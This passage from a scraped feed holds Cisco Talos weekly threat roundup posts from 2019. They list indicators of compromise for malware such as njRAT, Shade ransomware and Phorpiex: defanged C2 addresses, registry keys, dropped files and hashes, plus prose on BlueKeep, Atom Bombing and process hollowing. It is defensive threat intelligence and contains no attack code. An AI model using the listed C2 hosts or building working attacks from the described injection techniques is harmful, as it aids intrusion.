`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\DSP` Value Name: `ChangeNotice` | 1

Mutexes | Occurrences
---|---
`-e2a38afdMutex` | 25
`FvLQ49IlîIyLjj6m` | 25
`FvLQ49Il IyLjj6m` | 21

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`api[.]wipmania[.]com` | 21
`n[.]alnisat[.]com` | 21
`n[.]jagalot[.]com` | 21
`n[.]myadvsit1[.]com` | 21

Files and or directories created | Occurrences
---|---
`%APPDATA%\Microsoft\Exoiom.exe` | 21

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

[AMP detection screenshot]

* * *

### Win.Malware.njRAT-7363922-1

#### Indicators of Compromise

Mutexes | Occurrences
---|---
`e99e462d99ad204bdf7d672852a4e30a` | 21

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | 

#### Screenshots of Detection

[AMP detection screenshot]

* * *

### Win.Trojan.Socks-7363151-0

#### Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`208[.]100[.]26[.]251` | 24

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`fewfwe[.]net` | 24
`blinko-usa[.]com` | 24
`satellife[.]info` | 24

Files and or directories created | Occurrences
---|---
`%HOMEPATH%\cftmon.exe` | 24
`%SystemRoot%\SysWOW64\drivers\spools.exe` | 24

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

[AMP detection screenshot]

* * *

### Win.Malware.Lokibot-7363866-1

#### Indicators of Compromise

*See JSON for more IOCs

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

[AMP detection screenshot]

[Umbrella detection screenshot]

* * *

### Win.Packed.Zeroaccess-7358361-0

#### Indicators of Compromise

Mutexes | Occurrences
---|---
`Global\82f0e161-f7c1-11e9-a007-00501e3ae7b5` | 1
`Global\a280e5c1-f7c1-11e9-a007-00501e3ae7b5` | 1
`Global\d6367241-f7c1-11e9-a007-00501e3ae7b5` | 1

IP Addresses contacted by malware.
Does not indicate maliciousness | Occurrences \n---|--- \n`83[.]133[.]123[.]20` | 14 \n`212[.]253[.]253[.]254` | 9 \n`218[.]144[.]173[.]167` | 8 \n`98[.]248[.]140[.]174` | 7 \n`76[.]119[.]18[.]160` | 6 \n`82[.]130[.]158[.]137` | 6 \n`24[.]222[.]83[.]135` | 6 \n`1[.]161[.]150[.]169` | 6 \n`65[.]36[.]75[.]132` | 6 \n`50[.]7[.]216[.]66` | 5 \n`166[.]82[.]93[.]190` | 5 \n`36[.]2[.]141[.]192` | 5 \n`184[.]90[.]23[.]168` | 4 \n`72[.]189[.]202[.]136` | 4 \n`37[.]19[.]241[.]169` | 4 \n`31[.]134[.]253[.]187` | 4 \n`110[.]226[.]47[.]156` | 4 \n`74[.]88[.]57[.]193` | 4 \n`184[.]38[.]240[.]175` | 4 \n`5[.]43[.]242[.]139` | 4 \n`152[.]7[.]6[.]164` | 4 \n`190[.]105[.]127[.]197` | 4 \n`98[.]69[.]146[.]176` | 4 \n`86[.]124[.]234[.]155` | 4 \n`80[.]116[.]95[.]189` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`j[.]maxmind[.]com` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 21 \n`\\@` | 21 \n`\\L\\eexoxfxs` | 21 \n`\\systemroot\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}` | 16 \n`\\systemroot\\system32\\services.exe` | 16 \n`%System32%\\services.exe` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\@` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\L` | 16 \n`%SystemRoot%\\Installer\\{0f210b53-2df0-43a6-b654-d5b43088f74f}\\U` | 16 \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 5 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 5 \n`\\$Recycle.Bin\\S-1-5-18` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 
\n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 3 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0698b0699a2832438d3d40b9b254a1db6997650030a4f1baa9d83b195ddcefee 2a4480ab660655f0667496d06a8a6c4ca40795ea673a1d8be36c185fcd5843a2 2ff6a5a8fb138d625121b218c791129fdac013f6cea1fc4cac9a8f986a43a17e 61fe63c712ac33630cca861ad8bc3283d9e591a61184cf0c2e40e1712880e858 68073e04dff2910046705b41823a3d2e22de0b80722b2e0642f8bbad2251f31b 6c0cfbb2a0f755be5e73f9eebf0af5a66a8a9ccd9f064742275c45911aa4ba05 73efae80e8a1433ecce908d9d89a7e0dee9689f9e41a43858b7dd020ad98bdbb 81af3ef292ab1ca88658434c67ba4433727b2fa52c6170689cc7e6987d52e994 82c17d05d449adc7970c6d923a00567228d2f92d784e17e46fd40fb5f75fc96c 852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab 8bed5fd8ee4415d50e0fcfa15697455737ec30e371b9cf59998f16b9df82d655 8ff205742a2e987be8743877e3832f704a3d8a428adeaa809a62a2da3d98284f 90971a6f3936154d1d42143075a74343307211738f60fd8dc2704b9b1092b9eb 91b52463d52c11f45b8bc6e833560f374b3c23943ef83a596de4c9c263e25601 945e8db2a3e172c1b4def44a627f31ec3d92027c2302ae6ca8426995a0d2f330 97ab941d4e212453c834739eecc62dc6b23a2737b7e99fdfd5e5bc2b1e677070 97b0052c9b458793345d76e6a445608f464eb17c15a4a3e1ac62ecc2b5e19c70 9abab9e192eba949efed12bf34d82b796b872954a8928695c6c2eb539d7a9994 
9b57296d2b3a6e2d71d279e2f72a0c5764076e60db0decd1c933cea1ec68abbd 9be01433e0553992428c321e8ddb794697837e4266ebfcde8957190f175300d0 9bef202996bca3127c622f5b26c98bbe35ae6ef0aeea22f071517a4545c5daac 9c0d8b542bc6d349355dc8bff3d9f3436ec63033777b6ae2b7350b82a31f0b64 9c73a69c0eec3b51b0ede9d6ffdb4079c8f8ecab122dace2625d32f5a81794b1 9f6076a9aeff4a57d098390ff61e60b6a954ee545b8945fca5d39f4907de0e84 a0c2956a0dd44d0e177af551a6b3c0990a6d163f2d8e36a1b4370c667bf7bdd2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-pB5aFhwb7bE/XbxfE89Fl2I/AAAAAAAAC4s/MbaVn96IVYg87L3yZWyxIEzW_J9dqck_QCLcBGAsYHQ/s1600/852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Shade-7357624-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xi ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Client Server Runtime Subsystem ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xVersion ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32 ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shst ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: sh1 ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shsnt ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xstate ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xcnt ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\DEBUG \nValue Name: 
ExceptionRecord ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmode ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xpk ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\HOMEGROUP\\UISTATUSCACHE \nValue Name: OnlyMember ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APPLETS\\SYSTRAY \nValue Name: Services ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NLASVC\\PARAMETERS\\INTERNET\\MANUALPROXIES ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Drive Type ` | 6 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`76[.]73[.]17[.]194` | 5 \n`131[.]188[.]40[.]189` | 5 \n`208[.]83[.]223[.]34` | 4 \n`171[.]25[.]193[.]9` | 4 \n`86[.]59[.]21[.]38` | 3 \n`193[.]23[.]244[.]244` | 3 \n`194[.]109[.]206[.]212` | 3 \n`154[.]35[.]32[.]5` | 3 \n`128[.]31[.]0[.]39` | 3 \n`83[.]142[.]225[.]126` | 1 \n`137[.]74[.]19[.]202` | 1 \n`195[.]154[.]237[.]147` | 1 \n`81[.]17[.]17[.]131` | 1 \n`198[.]16[.]70[.]10` | 1 \n`5[.]9[.]116[.]66` | 1 \n`62[.]151[.]180[.]62` | 1 \n`193[.]105[.]73[.]80` | 1 \n`176[.]31[.]103[.]150` | 1 \n`194[.]59[.]207[.]195` | 1 \n`146[.]185[.]189[.]197` | 1 \n`144[.]76[.]143[.]137` | 1 \n`87[.]193[.]208[.]14` | 1 \n`98[.]128[.]172[.]233` | 1 \n`87[.]121[.]98[.]43` | 1 \n`141[.]157[.]13[.]229` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\README1.txt` | 12 \n`\\README10.txt` | 12 \n`\\README2.txt` | 12 \n`\\README3.txt` | 12 \n`\\README4.txt` | 12 \n`\\README5.txt` | 12 \n`\\README6.txt` | 12 \n`\\README7.txt` | 12 \n`\\README8.txt` | 12 \n`\\README9.txt` | 12 \n`%ProgramData%\\System32\\xfs` | 11 \n \n#### File Hashes\n\n` 26da7d57ec1798ddcdc4f016f4eb0752a6e1ecd5481091dc523ea01175093d8d 2a68d908566be84208cdb2f8f7d91e333690f9caee7e3f2e910483612c5a5046 5d7a85f85865277795519e6e7b5f656cf9904ed6dcdbb6d901482c47594cea7b 68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968 6f387364a1ebaebef7dc40f5bc1bf8200206b140e27050ff3f41fe6fb46c6b7f 7699113e80abe023018877fd18e3b39a29b26a21cd7dfcef06cbe9c0f9595cff 9714f035f6458b4496dd0e1362eded1eca6214ee35768b1e2f615124671b52e3 985418b9d311ec5b3f386204c2f65342856b90c5617fcbb1bf50bf1ae13ec3f1 b7005d089d4e060ea4528dbca67236924bb2310c0b214d3f74e0961effda7da4 b9bd26c9291c769620dd003b63619c10b741495bbef133d488dc877634cda0bc d48ef74859fc77868492c43758d01f618c2af1d007e570d3848fe1d5a246e10c deaa2c5a65617ca09fd4d84a268febc8ecdd660307a5fe576bbd10833d045de1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | 
N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-UCq2LBdJiG4/XbxhYZ7RguI/AAAAAAAAC44/JS8SudPVLcgtFwDOqZDqex713wrb-3gPwCLcBGAsYHQ/s1600/68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (57939) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (2838) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. 
\nKovter injection detected \\- (410) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (354) \nA PowerShell command with a very long command-line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats. \nProcess hollowing detected \\- (313) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (137) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (95) \nInstallcore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. 
Adware is known to sometimes download and install malware. \nDealply adware detected \\- (93) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nPowerShell file-less infection detected \\- (46) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nFusion adware detected \\- (29) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "cvss3": {}, "published": "2019-11-01T10:31:45", "type": "talosblog", "title": "Threat Roundup for October 25 to November 1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-11-01T10:31:45", "id": "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/bUEZpje_8WQ/threat-roundup-1025-1101.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-09T21:34:08", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 2 and Aug. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. 
Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d4dc7d3de3f5.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Swisyn-7105182-0 | Malware | Swisyn is a family of trojans that disguises itself as system files and services, and is known to drop follow-on malware on an infected system. Swisyn is often associated with rootkits that further conceal it on an infected machine. \nWin.Worm.Phorpiex-7104335-2 | Worm | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, from spam-sending malware to ransomware and cryptocurrency miners. 
\nWin.Malware.Zusy-7102354-1 | Malware | Zusy is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe\". When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Worm.Brontok-7102096-1 | Worm | Brontok is an email worm that can copy itself onto USB drives. It can change system configuration to weaken its security settings, conduct distributed denial-of-service attacks, and perform other malicious actions on the infected systems. \nWin.Worm.Socks-7102087-0 | Worm | Socks is a generic worm that spreads itself via autorun.inf files and downloads follow-on malware to infected systems. \nWin.Malware.Formbook-7102043-1 | Malware | Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard. \nWin.Malware.Tofsee-7101989-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control. \nWin.Malware.Chthonic-7101817-1 | Malware | Chthonic is a banking trojan derived from the Zeus family of banking malware. It is typically spread via phishing emails and attempts to steal sensitive information from an infected machine. Chthonic has also been observed downloading follow-on malware such as Azorult, another information stealer. 
\nWin.Malware.Remcos-7101023-0 | Malware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Swisyn-7105182-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Type ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ErrorControl ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ImagePath ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: DisplayName ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: WOW64 ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: ObjectName ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINMSS \nValue Name: Description ` | 9 \nMutexes | Occurrences \n---|--- \n`xinduanyou` | 9 \n`Global\\aca756c1-b9e5-11e9-a007-00501e3ae7b5` | 1 \n`Global\\ad6324e1-b9e5-11e9-a007-00501e3ae7b5` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`ZFT[.]QBAIDU[.]INFO` | 5 \n`che[.]qianma[.]info` | 4 \nFiles and or directories created | Occurrences \n---|--- \n`\\SfcApi` | 9 \n`%SystemRoot%\\inf\\oem13.PNF` | 9 \n`%SystemRoot%\\inf\\oem13.inf` | 9 \n`%SystemRoot%\\LastGood\\TMP4.tmp` | 9 \n`%SystemRoot%\\LastGood\\system32\\DRIVERS\\winyyy.sys (copy)` | 9 \n`%SystemRoot%\\Temp\\OLD5.tmp` | 9 \n`%SystemRoot%\\inf\\INFCACHE.0` | 9 \n`%SystemRoot%\\inf\\INFCACHE.1 (copy)` | 9 \n`%SystemRoot%\\stin.bat` | 9 \n`%System32%\\DRIVERS\\winyyy.sys (copy)` | 9 \n`%System32%\\drivers\\SET3.tmp` | 9 \n`%System32%\\drivers\\SET6.tmp` | 9 \n`%SystemRoot%\\winsys.exe` | 9 \n`%SystemRoot%\\winsys.inf` | 9 \n`%SystemRoot%\\winyyy.sys` | 9 \n`%SystemRoot%\\SMSS.bat` | 8 \n`%SystemRoot%\\lsass.exe` | 8 \n`%SystemRoot%\\winhost.exe` | 8 \n`%SystemRoot%\\SysWOW64\\SMSS.bat` | 1 \n`%SystemRoot%\\SysWOW64\\lsasys.exe` | 1 \n`%SystemRoot%\\SysWOW64\\winhost.exe` | 1 \n`%System32%\\SMSS.bat` | 1 \n`%System32%\\lsasys.exe` | 1 \n`%System32%\\winhost.exe` | 1 \n \n#### File Hashes\n\n` 0f502626053f598a870375325ba7f7c81c2a791d0fd2401d4d6bd27c784b5f90 37e5a76ef3b1de92c162fb42b6e783a9734ccb1d4f61e1252ec9a8aba6417ca2 64b2a00a400501b742eb336eceee3a398b418315ed676e37e4d4f3fc7ab76e2c 722449fd99d698856b809df09e75e79ec4cee7840960e3df72a8ceb3d954134c 729d483257c6907c3f423d344f2cb5c9a78a899455ef246fc033c965043272bb 96d5ea254ca506622c2c70c4bcb8594c62a20db7ce9552deb302166bda37b226 b784fc881fb56dceeaad3afbad770a3c76eaa1acc389877be514af02413c06e7 d8318b7b34f4662ee8b6b537ee08f763ffb7d2c4794b722561d305db65c6fc5f da0c26355fd7abdd3683beb7ab9f96efdec52207c150664bd177de4d794e6a53 de782ca97daf89c1208ea57618498de7aaa6f4ddbbc9794f3491dc947cca8cc3 e4aeeaf8b385bfccc637411b5030ab6c91a289cff425a14953e6549073478aa0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid 
|  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ajlIu0FYI9E/XU3L9-R0w0I/AAAAAAAACSY/aBJBUgQnH1Uv1y2g0CPGmKSxXP3HWi94QCLcBGAs/s1600/d8318b7b34f4662ee8b6b537ee08f763ffb7d2c4794b722561d305db65c6fc5f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pjqrtZHB_jA/XU3MOx0rp_I/AAAAAAAACSg/fHnank7YJ80mC9cHYud--e4jjow9m_yigCLcBGAs/s1600/64b2a00a400501b742eb336eceee3a398b418315ed676e37e4d4f3fc7ab76e2c_tg.png>)\n\n \n\n\n \n\n\n### Win.Worm.Phorpiex-7104335-2\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\M-5050402520507690204050\\winmgr.exe ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Manager ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Manager ` | 15 \nMutexes | Occurrences \n---|--- \n`t1100` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`195[.]22[.]26[.]248` | 15 \n`199[.]247[.]8[.]13` | 15 \n`208[.]100[.]26[.]250` | 14 \n`216[.]218[.]206[.]69` | 1 \nDomain Names contacted by malware. 
